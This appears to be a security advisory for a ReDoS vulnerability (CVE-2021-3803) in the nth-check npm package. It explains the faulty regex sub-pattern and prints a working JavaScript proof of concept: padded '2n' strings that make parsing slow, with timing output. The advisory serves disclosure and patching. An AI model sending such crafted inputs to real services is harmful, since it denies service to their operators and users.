GHSA-rp65-9cf3-cjxr
Inefficient Regular Expression Complexity in nth-check
Details
There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.
The ReDoS vulnerabilities of the regex are mainly due to the sub-pattern `\s*(?:([+-]?)\s*(\d+))?` with quantified overlapping adjacency and can be exploited with the following code.
**Proof of Concept** ```js // PoC.js var nthCheck = require("nth-check") for(var i = 1; i <= 50000; i++) { var time = Date.now(); var attack_str = '2n' + ' '.repeat(i*10000)+"!"; try { nthCheck.parse(attack_str) } catch(err) { var time_cost = Date.now() - time; console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms") } } ```
**The Output** ``` attack_str.length: 10003: 174 ms attack_str.length: 20003: 1427 ms attack_str.length: 30003: 2602 ms attack_str.length: 40003: 4378 ms attack_str.length: 50003: 7473 ms ```
Are you affected?
Enter the version of the package you're using.
Affected packages
References
- https://nvd.nist.gov/vuln/detail/CVE-2021-3803 [ADVISORY]
- https://github.com/fb55/nth-check/commit/9894c1d2010870c351f66c6f6efcf656e26bb726 [WEB]
- https://github.com/fb55/nth-check [PACKAGE]
- https://huntr.dev/bounties/8cf8cc06-d2cf-4b4e-b42c-99fafb0b04d0 [WEB]
- https://lists.debian.org/debian-lts-announce/2023/05/msg00023.html [WEB]